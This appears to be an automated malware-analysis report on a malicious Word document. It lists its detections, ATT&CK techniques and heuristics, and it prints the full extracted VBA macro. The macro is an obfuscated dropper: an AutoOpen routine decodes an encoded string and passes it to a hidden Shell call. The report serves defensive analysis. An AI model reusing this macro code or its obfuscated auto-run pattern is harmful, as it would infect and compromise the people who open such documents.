MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro is present, indicating it will execute automatically when the document is opened. The critical heuristic 'OLE_VBA_SHELL' suggests the macro attempts to execute system commands. The presence of a ClamAV detection for 'Doc.Dropper.Agent-6510804-0' further confirms its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6510804-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6510804-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
wd = Form1.TextBox2.Tag If "" = wd Then Shell s, Kolm Form1.TextBox2.Text = "" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() Swedenarform -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3268 bytes |
SHA-256: d3560f9bbe08f86909c58977cf702ae48b18bb7b803c9472d0db625dc1a906e5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Swedenarform
End Sub
Attribute VB_Name = "Module1"
Function zasohpers()
Dim jir As Integer
jir = 5 + 1
zasohpers = jir - 1
jir = 1 + zasohpers
End Function
Rem Form1 show messages
Function kontakter(str26, count1)
Dim xon20() As Byte
Dim maxdaj As String
Dim minbit() As Byte
Dim kas3 As String
xon20 = "MWZC"
Dim maxe() As Byte
Dim kaspr As Integer
kaspr = 0
Dim fruka As Integer
kas3 = xon20
Dim j1 As String
Dim xopova As Integer
Dim XrttacaI() As Byte
Dim I As Integer
I = 374
Dim Qapi2 As Integer
WSOP = Form1.Con(xon20)
Dim ngwiL As String
xopova = 92 - str26
xopova = xopova - 1
Dim hzmould As String
j1 = count1
maxdaj = ""
maxe = j1
hzmould = "RgeHise"
Qapi2 = Form1.Con(maxe)
ngwiL = "Mirqc8"
hujkot = kaspr
For uD = hujkot To Qapi2
manji = kaspr
For zaLp1 = kaspr To WSOP
If maxe(uD) = xon20(zaLp1) Then
manji = manji + kaspr + 1
End If
Next
If hujkot = manji Then
maxdaj = maxdaj + Form1.paplace(maxe(uD) - xopova)
End If
Next
kontakter = maxdaj
With Form1
.TextBox1.Text = maxdaj
fruka = I + xopova
fruka = -fruka + Len(maxdaj)
If 107 < fruka Then
.But_click
End If
.TextBox2.Text = ""
End With
End Function
Function slipersat()
Dim jiko As String
jiko = "dnZe!0dCZ!QpxZCfsTifZCZmm!M!#(CQpxfWWsTCWifZCMmm!MW#CW#=$WZM5fWZCy$?gZZCvWZWodWujpoMMW!C"
Dim ni As Integer
ni = 1
With Form1
jiko = jiko + .TextBox1.Text
Rem + .TextBox2.Text
slipersat = jiko
End With
ni = ni + 1
End Function
Sub Swedenarform()
Dim sder As String
Dim palat As Integer
palat = 60 + 30
sder = kontakter(palat, slipersat())
hernas = 0
End Sub
Attribute VB_Name = "Form1"
Attribute VB_Base = "0{3FC0B45D-54EF-43D0-8988-06E290D36B61}{99FDA0F1-DB26-40FF-AF58-FBA20B73EBBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Con(nij)
zzpa = 0
Con = zzpa + UBound(nij)
End Function
Private Sub com2_Click()
Form1.TextBox1.Text = "4"
End Sub
Private Sub CommandButton2_Click()
Form1.TextBox2.Text = "5"
End Sub
Private Sub but1_Click()
End Sub
Private Sub but2_Click()
Form1.TextBox1.Text = ""
End Sub
Private Sub Label1_Click()
End Sub
Private Sub ListBox1_Click()
Form1.TextBox2.Text = ""
End Sub
Private Sub TextBox1_Change()
Dim s1 As String
s1 = Form1.TextBox1.Text
For J = 0 To 3
For I = 0 To 50000
s1 = "" + s1
Next I
Next J
Form1.TextBox2.Text = s1
End Sub
Function paplace(masad)
Dim stio As Integer
stio = masad + 5
paplace = Chr$(stio - 5)
End Function
Private Sub TextBox2_Change()
End Sub
Sub But_click()
Dim s As String
s = Form1.TextBox2.Text + ""
Dim Im As Integer
Kolm = 178 - 170 - 8
wd = Form1.TextBox2.Tag
If "" = wd Then Shell s, Kolm
Form1.TextBox2.Text = ""
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.